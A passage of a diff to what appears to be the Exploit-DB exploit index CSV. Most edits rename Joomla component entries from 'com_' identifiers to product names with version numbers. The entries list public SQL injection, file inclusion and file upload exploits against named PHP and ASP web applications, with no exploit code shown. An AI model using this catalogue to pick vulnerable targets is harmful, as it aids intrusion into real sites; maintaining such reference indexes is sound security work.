Vulnerabilities",2009-04-27,d3v1l,php,webapps,0 -8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php ln' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 +8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - (category) SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - (pmscript.php with) Local File Inclusion",2009-04-27,SirGod,php,webapps,0 @@ -22654,7 +22656,7 @@ id,file,description,date,author,platform,type,port 11833,platforms/php/webapps/11833.txt,"4x CMS r26 - (Authentication Bypass) SQL Injection",2010-03-21,cr4wl3r,php,webapps,0 11835,platforms/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - (Authentication Bypass) SQL Injection",2010-03-22,cr4wl3r,php,webapps,0 11836,platforms/php/webapps/11836.txt,"CMS Openpage - 'index.php' SQL Injection",2010-03-22,Phenom,php,webapps,0 -14128,platforms/php/webapps/14128.txt,"Joomla! Component 'com_wmtpic' 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0 +14128,platforms/php/webapps/14128.txt,"Joomla! Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0 11837,platforms/php/webapps/11837.txt,"Uiga Fan Club - SQL Injection",2010-03-22,"Sioma Labs",php,webapps,0 11840,platforms/php/webapps/11840.txt,"PowieSys 0.7.7 alpha - 'index.php' (shownews) SQL Injection",2010-03-22,"Easy Laster",php,webapps,0 11841,platforms/php/webapps/11841.txt,"New Advisore Stack 1.1 - Directory Traversal",2010-03-22,R3VAN_BASTARD,php,webapps,0 @@ -22783,8 +22785,8 @@ id,file,description,date,author,platform,type,port 12049,platforms/php/webapps/12049.html,"Uiga Proxy - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 12050,platforms/php/webapps/12050.txt,"MassMirror Uploader - Multiple Remote File Inclusion",2010-04-04,cr4wl3r,php,webapps,0 12052,platforms/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Inclusion",2010-04-04,mat,php,webapps,0 -12054,platforms/php/webapps/12054.txt,"Joomla! Component 'com_redshop' 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 -12055,platforms/php/webapps/12055.txt,"Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 +12054,platforms/php/webapps/12054.txt,"Joomla! Component redSHOP 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 +12055,platforms/php/webapps/12055.txt,"Joomla! Component redTWITTER 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 12056,platforms/php/webapps/12056.txt,"Joomla! Component 'com_wisroyq' 1.1 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 12057,platforms/php/webapps/12057.txt,"Joomla! Component 'com_press' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 12058,platforms/php/webapps/12058.txt,"Joomla! Component Picasa 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0 @@ -22792,8 +22794,8 @@ id,file,description,date,author,platform,type,port 12061,platforms/php/webapps/12061.txt,"Facil-CMS 0.1RC2 - Local / Remote File Inclusion",2010-04-04,eidelweiss,php,webapps,0 12062,platforms/php/webapps/12062.txt,"Joomla! Component 'com_ranking' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 12065,platforms/php/webapps/12065.txt,"Joomla! Component JInventory 1.23.02 - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0 -12066,platforms/php/webapps/12066.txt,"Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 -12067,platforms/php/webapps/12067.txt,"Joomla! Component 'com_shoutbox' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 +12066,platforms/php/webapps/12066.txt,"Joomla! Component SVMap 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 +12067,platforms/php/webapps/12067.txt,"Joomla! Component Shoutbox Pro - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 12068,platforms/php/webapps/12068.txt,"Joomla! Component LoginBox - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 12069,platforms/php/webapps/12069.txt,"Joomla! Component 'com_bca-rss-syndicator' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 12070,platforms/php/webapps/12070.txt,"Joomla! Component Magic Updater - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 @@ -22802,7 +22804,7 @@ id,file,description,date,author,platform,type,port 12076,platforms/php/webapps/12076.pl,"ilchClan 1.0.5 - 'cid' SQL Injection",2010-04-05,"Easy Laster",php,webapps,0 12077,platforms/php/webapps/12077.txt,"Joomla! Component News Portal 1.5.x - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 12078,platforms/php/webapps/12078.txt,"Joomla! Component Freestyle FAQ Lite 1.3 - 'faqid' Parameter SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0 -12082,platforms/php/webapps/12082.txt,"Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 +12082,platforms/php/webapps/12082.txt,"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 12083,platforms/php/webapps/12083.txt,"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 12084,platforms/php/webapps/12084.txt,"Joomla! Component Juke Box 1.7 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 12085,platforms/php/webapps/12085.txt,"Joomla! Component Joomla Flickr 1.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 @@ -22812,20 +22814,20 @@ id,file,description,date,author,platform,type,port 12089,platforms/php/webapps/12089.txt,"Joomla! Component 'com_appointment' 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 12092,platforms/hardware/webapps/12092.txt,"McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting",2010-04-06,"Nahuel Grisolia",hardware,webapps,0 12094,platforms/php/webapps/12094.txt,"ShopSystem - SQL Injection",2010-04-06,Valentin,php,webapps,0 -12097,platforms/php/webapps/12097.txt,"Joomla! Component 'com_xobbix' 1.0 - 'prodid' Parameter SQL Injection",2010-04-06,AntiSecurity,php,webapps,0 +12097,platforms/php/webapps/12097.txt,"Joomla! Component XOBBIX 1.0 - 'prodid' Parameter SQL Injection",2010-04-06,AntiSecurity,php,webapps,0 12098,platforms/php/webapps/12098.txt,"WordPress Plugin NextGEN Gallery 1.5.1 - Cross-Site Scripting",2010-04-06,"Alejandro Rodriguez",php,webapps,0 12100,platforms/asp/webapps/12100.txt,"Espinas CMS - SQL Injection",2010-04-07,"Pouya Daneshmand",asp,webapps,0 12101,platforms/php/webapps/12101.txt,"Joomla! Component 'com_awiki' - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 -12102,platforms/php/webapps/12102.txt,"Joomla! Component 'com_vjdeo' 1.0 - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 +12102,platforms/php/webapps/12102.txt,"Joomla! Component VJDEO 1.0 - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 12105,platforms/php/webapps/12105.txt,"Free Image & File Hosting - Arbitrary File Upload",2010-04-07,indoushka,php,webapps,0 12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost - Multiple Vulnerabilities",2010-04-07,indoushka,php,webapps,0 12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusion",2010-04-07,eidelweiss,php,webapps,0 12108,platforms/php/webapps/12108.txt,"Joomla! Component 'com_articles' - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0 12111,platforms/php/webapps/12111.txt,"Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 -12112,platforms/php/webapps/12112.txt,"Joomla! Component 'com_realtyna' 1.0.15 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 +12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 12113,platforms/php/webapps/12113.txt,"Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0 12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0 -12118,platforms/php/webapps/12118.txt,"Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0 +12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0 12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0 12121,platforms/php/webapps/12121.txt,"Joomla! Component JA Voice 2.0 - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0 12123,platforms/php/webapps/12123.txt,"Joomla! Component 'com_pcchess' - Local File Inclusion",2010-04-09,team_elite,php,webapps,0 @@ -22835,22 +22837,22 @@ id,file,description,date,author,platform,type,port 12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0 12134,platforms/php/webapps/12134.txt,"MMHAQ CMS - SQL Injection",2010-04-10,s1ayer,php,webapps,0 12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps,0 -12136,platforms/php/webapps/12136.txt,"Joomla! Component 'com_properties' - 'aid' Parameter SQL Injection",2010-04-10,c4uR,php,webapps,0 +12136,platforms/php/webapps/12136.txt,"Joomla! Component Real Estate Property 3.1.22-03 - 'aid' Parameter SQL Injection",2010-04-10,c4uR,php,webapps,0 12137,platforms/php/webapps/12137.txt,"Joomla! Component 'com_allvideos' - Blind SQL Injection",2010-04-10,bumble_be,php,webapps,0 12138,platforms/php/webapps/12138.txt,"Joomla! Component 'com_ca' - SQL Injection",2010-04-10,DigitALL,php,webapps,0 12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine - SQL Injection",2010-04-10,indoushka,php,webapps,0 12140,platforms/php/webapps/12140.php,"xBtiTracker - SQL Injection",2010-04-11,InATeam,php,webapps,0 12141,platforms/php/webapps/12141.txt,"MediaInSpot CMS - Local File Inclusion (1)",2010-04-11,"Amoo Arash",php,webapps,0 -12142,platforms/php/webapps/12142.txt,"Joomla! Component 'com_tweetla' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 +12142,platforms/php/webapps/12142.txt,"Joomla! Component TweetLA 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12143,platforms/php/webapps/12143.txt,"Joomla! Component 'com_ticketbook' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12144,platforms/php/webapps/12144.txt,"Joomla! Component 'com_jajobboard' - Multiple Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12145,platforms/php/webapps/12145.txt,"Joomla! Component Jfeedback 1.2 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12146,platforms/php/webapps/12146.txt,"Joomla! Component JProject Manager 1.0 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12147,platforms/php/webapps/12147.txt,"Joomla! Component 'com_preventive' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12148,platforms/php/webapps/12148.txt,"Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps,0 +12147,platforms/php/webapps/12147.txt,"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 +12148,platforms/php/webapps/12148.txt,"Joomla! Component RokModule 1.1 - 'moduleid' Parameter Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps,0 12149,platforms/php/webapps/12149.txt,"Joomla! Component 'com_spsnewsletter' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12150,platforms/php/webapps/12150.txt,"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12151,platforms/php/webapps/12151.txt,"Joomla! Component 'com_travelbook' 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 +12151,platforms/php/webapps/12151.txt,"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12153,platforms/php/webapps/12153.txt,"Joomla! Component 'com_education_classess' - SQL Injection",2010-04-11,bumble_be,php,webapps,0 12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",php,webapps,0 12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software - SQL Injection",2010-04-11,Valentin,php,webapps,0 @@ -22860,7 +22862,7 @@ id,file,description,date,author,platform,type,port 12162,platforms/php/webapps/12162.txt,"Joomla! Component 'mv_restaurantmenumanager' - SQL Injection",2010-04-11,Sudden_death,php,webapps,0 12163,platforms/php/webapps/12163.txt,"Worldviewer.com CMS - SQL Injection",2010-04-12,"41.w4r10r aka AN1L",php,webapps,0 12164,platforms/php/webapps/12164.txt,"YaPiG 0.94.0u - Remote File Inclusion",2010-04-12,JIKO,php,webapps,0 -12166,platforms/php/webapps/12166.txt,"Joomla! Component 'com_webtv' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12166,platforms/php/webapps/12166.txt,"Joomla! Component Web TV 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12167,platforms/php/webapps/12167.txt,"Joomla! Component Horoscope 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12168,platforms/php/webapps/12168.txt,"Joomla! Component Arcade Games 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12169,platforms/php/webapps/12169.txt,"Joomla! Component 'com_Flashgames' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 @@ -22868,7 +22870,7 @@ id,file,description,date,author,platform,type,port 12171,platforms/php/webapps/12171.txt,"Joomla! Component Advertising 0.25 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12172,platforms/php/webapps/12172.txt,"Joomla! Component 'com_cvmaker' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12173,platforms/php/webapps/12173.txt,"Joomla! Component 'com_myfiles' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12174,platforms/php/webapps/12174.txt,"Joomla! Component 'com_onlineexam' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12174,platforms/php/webapps/12174.txt,"Joomla! Component Online Exam 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12175,platforms/php/webapps/12175.txt,"Joomla! Component 'com_joommail' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12176,platforms/php/webapps/12176.txt,"Joomla! Component 'com_memory' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12177,platforms/php/webapps/12177.txt,"Joomla! Component Online Market 2.x - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 @@ -22876,9 +22878,9 @@ id,file,description,date,author,platform,type,port 12179,platforms/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Inclusion",2010-04-12,cr4wl3r,php,webapps,0 12180,platforms/php/webapps/12180.txt,"Joomla! Component 'com_worldrates' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12181,platforms/php/webapps/12181.txt,"Joomla! Component 'com_record' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12182,platforms/php/webapps/12182.txt,"Joomla! Component 'com_sweetykeeper' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12182,platforms/php/webapps/12182.txt,"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12183,platforms/php/webapps/12183.txt,"Joomla! Component 'com_jdrugstopics' - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0 -12184,platforms/php/webapps/12184.txt,"Joomla! Component 'com_sermonspeaker' - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0 +12184,platforms/php/webapps/12184.txt,"Joomla! Component SermonSpeaker - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0 12185,platforms/php/webapps/12185.txt,"Joomla! Component 'com_flexicontent' - Local File",2010-04-12,eidelweiss,php,webapps,0 12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-12,cr4wl3r,php,webapps,0 12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles 1.0/2.0 - 'aid' Parameter SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0 @@ -22890,7 +22892,7 @@ id,file,description,date,author,platform,type,port 12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik - DataBase Download",2010-04-13,indoushka,asp,webapps,0 12198,platforms/php/webapps/12198.txt,"Games Script - (Galore) Backup Dump",2010-04-13,indoushka,php,webapps,0 12199,platforms/asp/webapps/12199.txt,"My School Script - Data Base Download",2010-04-13,indoushka,asp,webapps,0 -12200,platforms/php/webapps/12200.txt,"Joomla! Component 'com_QPersonel' - SQL Injection",2010-04-13,Valentin,php,webapps,0 +12200,platforms/php/webapps/12200.txt,"Joomla! Component QPersonel 1.0.2 - SQL Injection",2010-04-13,Valentin,php,webapps,0 12212,platforms/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 - Local File Inclusion",2010-04-14,cr4wl3r,php,webapps,0 12218,platforms/asp/webapps/12218.txt,"School Management System Pro 6.0.0 - Backup Dump",2010-04-14,indoushka,asp,webapps,0 12219,platforms/php/webapps/12219.txt,"Mp3 Online Id Tag Editor - Remote File Inclusion",2010-04-14,indoushka,php,webapps,0 @@ -22903,7 +22905,7 @@ id,file,description,date,author,platform,type,port 12227,platforms/php/webapps/12227.txt,"YUI Images Script - Arbitrary File Upload",2010-04-14,Mr.P3rfekT,php,webapps,0 12230,platforms/php/webapps/12230.txt,"Joomla! Component 'com_wgpicasa' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 12231,platforms/php/webapps/12231.txt,"Joomla! Component 'com_s5clanroster' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 -12232,platforms/php/webapps/12232.txt,"Joomla! Component 'com_photobattle' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 +12232,platforms/php/webapps/12232.txt,"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 12233,platforms/php/webapps/12233.txt,"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 12234,platforms/php/webapps/12234.txt,"Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0 12235,platforms/php/webapps/12235.txt,"Joomla! Component Love Factory 1.3.4 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 @@ -22934,8 +22936,8 @@ id,file,description,date,author,platform,type,port 12279,platforms/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup",2010-04-18,indoushka,php,webapps,0 12280,platforms/php/webapps/12280.txt,"dl_stats - Multiple Vulnerabilities",2010-04-18,"Valentin Hoebel",php,webapps,0 12282,platforms/php/webapps/12282.txt,"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion",2010-04-18,"wishnusakti + inc0mp13te",php,webapps,0 -12283,platforms/php/webapps/12283.txt,"Joomla! Component 'com_zimbcomment' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 -12284,platforms/php/webapps/12284.txt,"Joomla! Component 'com_zimbcore' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 +12283,platforms/php/webapps/12283.txt,"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 +12284,platforms/php/webapps/12284.txt,"Joomla! Component ZiMBCore 0.1 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 12285,platforms/php/webapps/12285.txt,"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 12286,platforms/php/webapps/12286.txt,"Joomla! Component Matamko 1.01 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 12287,platforms/php/webapps/12287.txt,"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 @@ -22953,8 +22955,8 @@ id,file,description,date,author,platform,type,port 12306,platforms/php/webapps/12306.txt,"Joomla! Component JTM Reseller 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0 12313,platforms/php/webapps/12313.txt,"Openregistrecil 1.02 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-20,cr4wl3r,php,webapps,0 12315,platforms/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) - Arbitrary File Upload",2010-04-21,cyberlog,php,webapps,0 -12316,platforms/php/webapps/12316.txt,"Joomla! Component 'com_wmi' - Local File Inclusion",2010-04-21,"wishnusakti + inc0mp13te",php,webapps,0 -12317,platforms/php/webapps/12317.txt,"Joomla! Component 'com_orgchart' - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0 +12316,platforms/php/webapps/12316.txt,"Joomla! Component WMI 1.5.0 - Local File Inclusion",2010-04-21,"wishnusakti + inc0mp13te",php,webapps,0 +12317,platforms/php/webapps/12317.txt,"Joomla! Component OrgChart 1.0.0 - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0 12318,platforms/php/webapps/12318.txt,"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0 12319,platforms/php/webapps/12319.txt,"e107 CMS 0.7.19 - Cross-Site Request Forgery",2010-04-21,"High-Tech Bridge SA",php,webapps,0 12322,platforms/php/webapps/12322.txt,"LightNEasy 3.1.x - Multiple Vulnerabilities",2010-04-21,ITSecTeam,php,webapps,0 @@ -23014,9 +23016,9 @@ id,file,description,date,author,platform,type,port 12421,platforms/php/webapps/12421.txt,"Help Center Live 2.0.6 - (module=helpcenter&file=) Local File Inclusion",2010-04-27,41.w4r10r,php,webapps,0 12423,platforms/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,php,webapps,0 12424,platforms/asp/webapps/12424.txt,"Acart 2.0 Shopping Cart - Software Backup Dump",2010-04-27,indoushka,asp,webapps,0 -12426,platforms/php/webapps/12426.txt,"Joomla! Component 'com_ultimateportfolio' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 +12426,platforms/php/webapps/12426.txt,"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 12427,platforms/php/webapps/12427.txt,"Joomla! Component NoticeBoard 1.3 - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 -12428,platforms/php/webapps/12428.txt,"Joomla! Component 'com_smartsite' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 +12428,platforms/php/webapps/12428.txt,"Joomla! Component SmartSite 1.0.0 - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 12429,platforms/php/webapps/12429.pl,"Joomla! Component ABC 1.1.7 - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0 12430,platforms/php/webapps/12430.txt,"Joomla! Component Graphics 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0 12432,platforms/php/webapps/12432.txt,"Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0 @@ -23146,10 +23148,10 @@ id,file,description,date,author,platform,type,port 12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 - (tiny_mce) Arbitrary File Upload",2010-05-15,ITSecTeam,php,webapps,0 12615,platforms/php/webapps/12615.txt,"Joomla! Component 'com_camp' - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0 12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0 -12618,platforms/php/webapps/12618.txt,"Joomla! Component 'com_simpledownload' 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps,0 +12618,platforms/php/webapps/12618.txt,"Joomla! Component simpledownload 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps,0 12619,platforms/php/webapps/12619.txt,"Cybertek CMS - Local File Inclusion",2010-05-16,XroGuE,php,webapps,0 12620,platforms/php/webapps/12620.txt,"The iceberg - 'Content Management System' SQL Injection",2010-05-16,cyberlog,php,webapps,0 -12623,platforms/php/webapps/12623.txt,"Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure",2010-05-16,ALTBTA,php,webapps,0 +12623,platforms/php/webapps/12623.txt,"Joomla! Component simpledownload 0.9.5 - Local File Disclosure",2010-05-16,ALTBTA,php,webapps,0 12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - 'rotate.php' Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0 12628,platforms/php/webapps/12628.txt,"EgO 0.7b - 'FCKeditor' Arbitrary File Upload",2010-05-16,ITSecTeam,php,webapps,0 12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0 @@ -23200,7 +23202,7 @@ id,file,description,date,author,platform,type,port 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,cr4wl3r,php,webapps,0 14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 -12692,platforms/php/webapps/12692.txt,"Wordpress Plugin TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0 +12692,platforms/php/webapps/12692.txt,"WordPress Plugin TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0 12693,platforms/asp/webapps/12693.txt,"Asset Manager - Arbitrary File Upload",2010-05-22,Ra3cH,asp,webapps,0 12694,platforms/php/webapps/12694.txt,"Tochin eCommerce - Multiple Remote Exploits",2010-05-22,cyberlog,php,webapps,0 12695,platforms/php/webapps/12695.txt,"Azimut Technologie - Admin Login Bypass",2010-05-22,Ra3cH,php,webapps,0 @@ -23226,7 +23228,7 @@ id,file,description,date,author,platform,type,port 12720,platforms/php/webapps/12720.txt,"Schaf-CMS 1.0 - SQL Injection",2010-05-24,Manas58,php,webapps,0 12721,platforms/php/webapps/12721.txt,"Apache Axis2 1.4.1 - Local File Inclusion",2010-05-24,HC,php,webapps,0 12722,platforms/php/webapps/12722.txt,"interuse Website Builder & design - 'index2.php' SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 -12723,platforms/php/webapps/12723.py,"Joomla! Component 'com_qpersonel' 1.0 - SQL Injection",2010-05-24,"Valentin Hoebel",php,webapps,0 +12723,platforms/php/webapps/12723.py,"Joomla! Component Q-Personel 1.0 - SQL Injection",2010-05-24,"Valentin Hoebel",php,webapps,0 12724,platforms/php/webapps/12724.php,"WebAsys - Blind SQL Injection",2010-05-24,zsh.shell,php,webapps,0 12725,platforms/php/webapps/12725.txt,"ALSCO CMS - SQL Injection",2010-05-24,PrinceofHacking,php,webapps,0 12726,platforms/php/webapps/12726.txt,"REvolution 10.02 - Cross-Site Request Forgery",2010-05-24,"High-Tech Bridge SA",php,webapps,0 @@ -23324,7 +23326,7 @@ id,file,description,date,author,platform,type,port 13741,platforms/php/webapps/13741.txt,"iScripts easybiller 1.1 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0 13744,platforms/php/webapps/13744.txt,"RTRandomImage - Remote File Inclusion",2010-06-06,"Sn!pEr.S!Te Hacker",php,webapps,0 13745,platforms/php/webapps/13745.txt,"Sphider Script - Remote Code Execution",2010-06-06,XroGuE,php,webapps,0 -13746,platforms/php/webapps/13746.txt,"Joomla! Component 'com_searchlog' - SQL Injection",2010-06-06,d0lc3,php,webapps,0 +13746,platforms/php/webapps/13746.txt,"Joomla! Component Search Log 3.1.0 - SQL Injection",2010-06-06,d0lc3,php,webapps,0 13747,platforms/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0 13748,platforms/php/webapps/13748.txt,"Joomla! Component 'com_annonces' - Arbitrary File Upload",2010-06-06,Sid3^effects,php,webapps,0 13749,platforms/php/webapps/13749.txt,"idevspot Text ads 2.08 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0 @@ -23437,7 +23439,7 @@ id,file,description,date,author,platform,type,port 13918,platforms/multiple/webapps/13918.txt,"Spring Framework - Arbitrary code 